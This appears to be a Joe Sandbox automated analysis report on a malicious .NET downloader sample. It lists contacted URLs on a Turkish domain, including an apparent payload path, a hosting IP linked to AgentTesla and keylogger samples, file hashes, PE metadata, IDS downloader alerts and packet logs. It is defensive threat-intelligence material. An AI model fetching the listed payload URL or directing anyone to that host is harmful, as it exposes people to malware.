      http://www.alternatifplastik.comdOfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000025AF000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000298B000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.alternatifplastik.com/dixa/Dquqrwaot.mp4XOfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000027EB000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002753000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002659000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002A18000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002666000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000025DA000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002984000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000299D000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000259B000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000263F000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002780000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000268D000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000027C5000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029E6000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002955000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000298B000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029A7000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://www.alternatifplastik.comOfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000025AF000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000298B000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.alternatifplastik.comDOfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002A18000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029E6000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002A26000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029F2000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://alternatifplastik.comOfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000025AF000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000298B000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.alternatifplastik.com/dixa/DquqrwaOfQ4QRmP65.exe, 00000000.00000002.2960108048.0000000002556000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000029DD000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000259B000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://alternatifplastik.comdOfQ4QRmP65.exe, 00000000.00000002.2960108048.00000000025AF000.00000004.00000800.00020000.00000000.sdmp, OfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000298B000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://www.alternatifplastik.comOfQ4QRmP65.exe, 00000000.00000002.2960108048.000000000259B000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        5.2.84.236
        alternatifplastik.comTurkey
        3188ALASTYRTRfalse
        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1631777
        Start date and time:2025-03-07 15:46:57 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 48s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:12
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:OfQ4QRmP65.exe
        renamed because original name is a hash value
        Original Sample Name:da194a0285b5b4c9e69c4ae59430e286a81682c0db27e65a99215eb0f1e4fd2a.exe
        Detection:MAL
        Classification:mal64.evad.winEXE@1/0@1/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 94%
        • Number of executed functions: 40
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 23.60.203.209
        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
        • Execution Graph export aborted for target OfQ4QRmP65.exe, PID 7112 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        5.2.84.236________.exeGet hashmaliciousDarkCloudBrowse
          vFfM8ihiqU.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            O65887cvz7.exeGet hashmaliciousAgentTeslaBrowse
              Request for Quotation-537262227-04.exeGet hashmaliciousAgentTeslaBrowse
                AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                  GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                    GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                      Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                        PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          alternatifplastik.comO65887cvz7.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          Request for Quotation-537262227-04.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          ALASTYRTR________.exeGet hashmaliciousDarkCloudBrowse
                          • 5.2.84.236
                          vFfM8ihiqU.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 5.2.84.236
                          Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                          • 5.2.81.126
                          medicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                          • 5.2.81.126
                          O65887cvz7.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          Request for Quotation-537262227-04.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                          • 5.2.84.236
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0eckHregxJIq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 5.2.84.236
                          gIPDZfPhpW.exeGet hashmaliciousUnknownBrowse
                          • 5.2.84.236
                          PvAmrCZENy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 5.2.84.236
                          gIPDZfPhpW.exeGet hashmaliciousUnknownBrowse
                          • 5.2.84.236
                          8JVG9KELay.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 5.2.84.236
                          bdc2be5bddda548dec3c2d88464a698627ac9447aae621d8.ps1Get hashmaliciousLummaC StealerBrowse
                          • 5.2.84.236
                          https://rea.grupolalegion.ec/p.php/1Get hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                          • 5.2.84.236
                          https://atremote-portal.eu/NXLoginGet hashmaliciousUnknownBrowse
                          • 5.2.84.236
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):6.090883353313671
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:OfQ4QRmP65.exe
                          File size:38'912 bytes
                          MD5:2b93577260f06791d5acc7d6d9a1c492
                          SHA1:6f4d46f7ceab6b310a0b705d772f4dfcb369545f
                          SHA256:da194a0285b5b4c9e69c4ae59430e286a81682c0db27e65a99215eb0f1e4fd2a
                          SHA512:e8c4f0e667b7e974780c040fc0ad985902c1c9d5a1d2cd51dc5562102d750241a0a16328a54fafb381a3fa17790b6d419f70d1d8c93e6110307d534e73ff28e6
                          SSDEEP:768:5jHBiwnnCeIQoTP78o/i6g4gPdQOY2+XIrhLzDuRfrKhFvxoK6knCAC3H/Zso:JBiwnnCeF1yy6VpupDwrKhb6kCAOf3
                          TLSH:B1034B0C77CC9B20C6A8657D8DB3890513F762F32E02D79B9E88365C1D43BD9964AB1B
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w.g............................>.... ........@.. ....................................`................................
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0x40ad3e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x679877FD [Tue Jan 28 06:23:57 2025 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xace40x57.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x600.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x8d440x8e00391b957b5d0bb4e9cbbcfc6a0dafd09aFalse0.5983714788732394data6.2235436408332125IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0xc0000x6000x60042fb12c38a7d2aebf7a1a7002e43d181False0.4205729166666667data4.137136212677182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xe0000xc0x20078a9beaaa6719d14634082fa843737e0False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_VERSION0xc0a00x32cdata0.42610837438423643
                          RT_MANIFEST0xc3cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                          DLLImport
                          mscoree.dll_CorExeMain
                          DescriptionData
                          Translation0x0000 0x04b0
                          Comments
                          CompanyName
                          FileDescriptionPgxqwjdryfu
                          FileVersion1.0.0.0
                          InternalNamePgxqwjdryfu.exe
                          LegalCopyrightCopyright 2024
                          LegalTrademarks
                          OriginalFilenamePgxqwjdryfu.exe
                          ProductNamePgxqwjdryfu
                          ProductVersion1.0.0.0
                          Assembly Version1.0.0.0
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2025-03-07T15:48:04.821852+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497005.2.84.236443TCP
                          2025-03-07T15:48:07.594123+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497015.2.84.236443TCP
                          2025-03-07T15:48:10.383124+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497025.2.84.236443TCP
                          2025-03-07T15:48:13.084766+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497065.2.84.236443TCP
                          2025-03-07T15:48:15.807682+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497085.2.84.236443TCP
                          2025-03-07T15:48:18.497229+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497105.2.84.236443TCP
                          2025-03-07T15:48:21.420599+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497115.2.84.236443TCP
                          2025-03-07T15:48:24.454426+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497125.2.84.236443TCP
                          2025-03-07T15:48:27.263364+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497135.2.84.236443TCP
                          2025-03-07T15:48:30.023082+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497145.2.84.236443TCP
                          2025-03-07T15:48:32.677988+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497155.2.84.236443TCP
                          2025-03-07T15:48:35.363432+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497165.2.84.236443TCP
                          2025-03-07T15:48:38.042178+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497175.2.84.236443TCP
                          2025-03-07T15:48:41.177668+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497205.2.84.236443TCP
                          2025-03-07T15:48:43.960824+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497215.2.84.236443TCP
                          2025-03-07T15:48:47.032034+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497225.2.84.236443TCP
                          2025-03-07T15:48:49.714871+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497235.2.84.236443TCP
                          2025-03-07T15:48:52.487854+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497245.2.84.236443TCP
                          2025-03-07T15:48:55.243493+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497255.2.84.236443TCP
                          2025-03-07T15:48:57.962934+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497265.2.84.236443TCP
                          2025-03-07T15:49:00.732454+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497275.2.84.236443TCP
                          2025-03-07T15:49:03.489313+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497285.2.84.236443TCP
                          2025-03-07T15:49:06.234216+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497295.2.84.236443TCP
                          2025-03-07T15:49:08.984079+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497305.2.84.236443TCP
                          2025-03-07T15:49:11.696238+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497315.2.84.236443TCP
                          2025-03-07T15:49:14.467404+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497325.2.84.236443TCP
                          2025-03-07T15:49:17.226749+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497335.2.84.236443TCP
                          2025-03-07T15:49:19.944143+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497345.2.84.236443TCP
                          2025-03-07T15:49:22.626365+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497355.2.84.236443TCP
                          2025-03-07T15:49:25.317866+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497365.2.84.236443TCP
                          2025-03-07T15:49:27.947199+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497375.2.84.236443TCP
                          2025-03-07T15:49:30.602911+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497385.2.84.236443TCP
                          2025-03-07T15:49:33.651459+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497395.2.84.236443TCP
                          2025-03-07T15:49:36.586758+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497405.2.84.236443TCP
                          2025-03-07T15:49:39.548730+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497415.2.84.236443TCP
                          2025-03-07T15:49:42.381164+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497425.2.84.236443TCP
                          2025-03-07T15:49:45.213974+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497435.2.84.236443TCP
                          2025-03-07T15:49:48.286545+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497445.2.84.236443TCP
                          2025-03-07T15:49:51.110173+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497455.2.84.236443TCP
                          2025-03-07T15:49:54.211405+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497465.2.84.236443TCP
                          2025-03-07T15:49:57.026369+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497475.2.84.236443TCP
                          2025-03-07T15:50:00.132403+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497485.2.84.236443TCP
                          2025-03-07T15:50:03.099242+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497495.2.84.236443TCP
                          2025-03-07T15:50:06.075586+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497505.2.84.236443TCP
                          2025-03-07T15:50:08.783291+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497515.2.84.236443TCP
                          2025-03-07T15:50:11.723178+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497525.2.84.236443TCP
                          2025-03-07T15:50:14.697100+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497535.2.84.236443TCP
                          2025-03-07T15:50:17.600518+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497545.2.84.236443TCP
                          2025-03-07T15:50:20.524200+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497555.2.84.236443TCP
                          2025-03-07T15:50:23.483363+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497565.2.84.236443TCP
                          2025-03-07T15:50:26.150071+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497575.2.84.236443TCP
                          2025-03-07T15:50:28.953930+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497585.2.84.236443TCP
                          2025-03-07T15:50:31.728756+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497595.2.84.236443TCP
                          2025-03-07T15:50:34.828218+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497605.2.84.236443TCP
                          2025-03-07T15:50:37.546130+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497615.2.84.236443TCP
                          2025-03-07T15:50:40.285644+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497625.2.84.236443TCP
                          2025-03-07T15:50:43.089473+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497635.2.84.236443TCP
                          2025-03-07T15:50:45.967075+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497645.2.84.236443TCP
                          2025-03-07T15:50:48.850356+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497655.2.84.236443TCP
                          2025-03-07T15:50:51.712437+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497665.2.84.236443TCP
                          2025-03-07T15:50:54.506175+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497675.2.84.236443TCP
                          2025-03-07T15:50:57.289063+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497685.2.84.236443TCP
                          2025-03-07T15:50:59.968992+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497695.2.84.236443TCP
                          2025-03-07T15:51:02.843672+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.11497705.2.84.236443TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 7, 2025 15:47:58.264276981 CET49699443192.168.2.115.2.84.236
                          Mar 7, 2025 15:47:58.264336109 CET443496995.2.84.236192.168.2.11
                          Mar 7, 2025 15:47:58.264403105 CET49699443192.168.2.115.2.84.236
                          Mar 7, 2025 15:47:58.608246088 CET49699443192.168.2.115.2.84.236
                          Mar 7, 2025 15:47:58.608273029 CET443496995.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:00.674396992 CET443496995.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:00.674532890 CET49699443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:00.738892078 CET49699443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:00.738920927 CET443496995.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:00.739304066 CET443496995.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:00.789762974 CET49699443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:01.026920080 CET49699443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:01.068325996 CET443496995.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:01.555704117 CET443496995.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:01.589129925 CET443496995.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:01.589230061 CET49699443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:01.597044945 CET49699443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:01.612466097 CET49700443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:01.612521887 CET443497005.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:01.612600088 CET49700443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:01.613035917 CET49700443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:01.613054037 CET443497005.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:03.930630922 CET443497005.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:03.932816982 CET49700443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:03.932831049 CET443497005.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:04.821913004 CET443497005.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:04.821975946 CET443497005.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:04.822043896 CET49700443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:04.826894999 CET49700443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:04.827934027 CET49701443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:04.827985048 CET443497015.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:04.828049898 CET49701443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:04.828399897 CET49701443192.168.2.115.2.84.236
                          Mar 7, 2025 15:48:04.828412056 CET443497015.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:06.860295057 CET443497015.2.84.236192.168.2.11
                          Mar 7, 2025 15:48:06.863058090 CET49701443192.168.2.115.2.84.236
